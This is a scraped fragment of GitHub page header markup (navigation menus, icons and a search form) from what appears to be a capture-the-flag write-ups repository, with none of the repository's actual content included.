<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="162845937" data-scoped-search-url="/KEERRO/ctf-writeups/search" data-owner-scoped-search-url="/users/KEERRO/search" data-unscoped-search-url="/search" data-turbo="false" action="/KEERRO/ctf-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="RriZpUJTQ379oBEoaw46RwN2p6vUz4pYoqbup1qRdQC3+FPTJDlhaNN08Lq0s7CNA/rL8Psm/aO7DSEH3rTWww==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
